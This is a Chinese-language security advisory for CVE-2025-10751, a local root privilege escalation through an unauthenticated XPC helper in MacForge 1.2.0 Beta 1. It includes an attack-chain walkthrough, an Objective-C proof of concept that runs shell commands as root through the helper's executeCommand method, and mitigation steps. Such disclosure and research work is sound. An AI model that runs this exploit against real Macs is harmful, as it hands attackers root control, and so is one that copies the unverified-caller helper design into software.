CVE-2025-10751：MacForge不安全XPC服务导致本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-10751

漏洞类型

权限提升（XPC服务不安全）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MacForge

漏洞概述

CVE-2025-10751是MacForge 1.2.0 Beta 1版本中存在的一个高危本地权限提升漏洞。该漏洞源于MacForge安装了一个不安全的XPC（跨进程通信）服务，该服务未能正确验证客户端的身份和权限，允许本地任意未授权用户通过与该XPC服务进行通信来执行特权操作，最终将权限提升至root级别。

MacForge是macOS平台上一款用于安装和管理插件、主题及系统扩展的工具软件，其运行的XPC服务通常需要以高权限（如root）执行以完成系统级别的修改操作。然而，该漏洞使得任何本地低权限用户均可利用该服务接口执行任意命令或修改敏感系统配置，从而完全控制系统。

该漏洞由Fluid Attacks安全团队发现并报告，CVSS 3.1评分为7.8，属于高危级别。其攻击向量为本地（AV:L），攻击者只需拥有普通用户权限（PR:L）即可在无需用户交互（UI:N）的情况下完成利用，对系统的机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。该漏洞严重威胁macOS系统的安全边界，特别是在多用户环境或共享工作站场景下，可能导致普通用户完全控制系统。

技术细节

MacForge的XPC服务实现存在严重的安全缺陷。XPC（Cross-Process Communication）是Apple提供的进程间通信机制，常用于特权进程与普通进程之间的安全通信。安全的XPC服务应使用适当的验证机制（如auditToken验证、entitlement检查等）来确保只有经过授权的客户端才能调用其接口。

在MacForge 1.2.0 Beta 1中，该XPC服务缺少以下关键安全措施：
1. 未对客户端进程的签名（code signing）进行验证；
2. 未检查客户端的entitlement（权限声明）；
3. 未使用SMJobBless等安全的服务注册机制；
4. 未对auditToken进行身份验证。

攻击原理：攻击者作为本地普通用户，可以编写一个恶意的Objective-C/Swift程序，利用NSXPCConnection连接到MacForge的XPC服务。由于服务未验证调用者身份，攻击者可以直接调用服务暴露的高权限方法（如以root身份执行shell命令、修改系统文件等），从而实现从普通用户到root的权限提升。

利用方式：攻击者通过创建NSXPCConnection对象连接到目标服务的Mach端口名称，然后构造符合服务接口定义的远程过程调用（RPC）消息，调用特权方法执行任意操作。整个攻击过程无需用户交互，可在后台静默完成。

攻击链分析

STEP 1

步骤1：环境准备

攻击者以本地普通用户身份登录macOS系统，确认目标系统安装了存在漏洞的MacForge 1.2.0 Beta 1版本，且其XPC服务正在运行。

STEP 2

步骤2：编写恶意客户端

攻击者编写一个Objective-C/Swift程序，使用NSXPCConnection API创建到MacForge特权XPC服务的连接，声明服务暴露的协议接口。

STEP 3

步骤3：建立XPC连接

由于目标XPC服务未对客户端进行身份验证（缺少auditToken检查、entitlement验证等），连接成功建立，攻击者获得特权服务的远程对象代理。

STEP 4

步骤4：调用特权方法

攻击者通过远程对象代理调用XPC服务暴露的高权限方法（如以root身份执行任意shell命令），服务在root权限下执行攻击者指定的命令。

STEP 5

步骤5：权限提升完成

攻击者成功以root权限执行任意代码，可读取敏感文件、安装持久化后门、修改系统配置或完全控制系统，实现完整的本地权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-10751 - MacForge Insecure XPC Service Privilege Escalation PoC
// This PoC demonstrates how a local unprivileged user can exploit the
// insecure XPC service in MacForge 1.2.0 Beta 1 to escalate privileges to root.
//
// Note: Requires linking against Foundation framework.
// Compile: clang -framework Foundation exploit.m -o exploit

#import <Foundation/Foundation.h>

// Mach service name of the vulnerable MacForge XPC service
static NSString * const kMacForgeXPCServiceName = @"com.macenhance.MacForge.helper";

// XPC interface protocol - methods exposed by the privileged helper
@protocol MacForgeHelperProtocol
- (void)executeCommand:(NSString *)command withReply:(void (^)(NSString *output, NSError *error))reply;
- (void)installPluginAtPath:(NSString *)path withReply:(void (^)(BOOL success, NSError *error))reply;
@end

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        NSLog(@"[*] CVE-2025-10751 - MacForge XPC Privilege Escalation PoC");
        
        // Step 1: Create a connection to the vulnerable XPC service
        NSXPCConnection *connection = [[NSXPCConnection alloc]
            initWithServiceName:kMacForgeXPCServiceName];
        
        // Step 2: Set the remote object interface (no validation required by the service)
        connection.remoteObjectInterface = [NSXPCInterface
            interfaceWithProtocol:@protocol(MacForgeHelperProtocol)];
        
        // Step 3: Resume the connection (establishes Mach port communication)
        [connection resume];
        
        NSLog(@"[*] Connected to MacForge XPC service");
        
        // Step 4: Obtain proxy to the privileged helper object
        id<MacForgeHelperProtocol> proxy = [connection remoteObjectProxy];
        
        // Step 5: Call privileged method to execute command as root
        // The vulnerable service does not verify the caller's identity,
        // so this command will execute with root privileges
        NSString *cmd = @"/bin/sh -c 'id > /tmp/pwned_by_cve_2025_10751.txt; whoami >> /tmp/pwned_by_cve_2025_10751.txt'";
        
        [proxy executeCommand:cmd withReply:^(NSString *output, NSError *error) {
            if (error) {
                NSLog(@"[-] Error: %@", error);
            } else {
                NSLog(@"[+] Command output: %@", output);
                NSLog(@"[+] Privilege escalation successful! Check /tmp/pwned_by_cve_2025_10751.txt");
            }
            
            // Cleanup
            [connection invalidate];
            exit(0);
        }];
        
        // Keep the run loop alive for async reply
        [[NSRunLoop mainRunLoop] run];
    }
    return 0;
}

影响范围

MacForge 1.2.0 Beta 1

防御指南

临时缓解措施

在官方补丁发布之前，建议用户：1）卸载或禁用存在漏洞的MacForge 1.2.0 Beta 1版本；2）使用macOS Activity Monitor或lsof命令查找并终止MacForge相关的XPC服务进程；3）通过System Settings > Privacy & Security检查并限制MacForge的辅助功能及完全磁盘访问权限；4）在多用户环境中对普通用户实施严格的权限管控，监控/var/log/audit/下的异常提权日志；5）关注Fluid Attacks官方公告（https://fluidattacks.com/advisories/m83）以及MacEnhance项目（https://github.com/MacEnhance/MacForge）的更新动态，及时应用安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-10751
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-10751
3 Details https://www.cvedetails.com/cve/CVE-2025-10751/
4 VulDB https://vuldb.com/cve/CVE-2025-10751
5 Link https://fluidattacks.com/advisories/m83
6 Link https://github.com/MacEnhance/MacForge
7 Link https://www.macenhance.com/macforge
8 Link https://fluidattacks.com/advisories/m83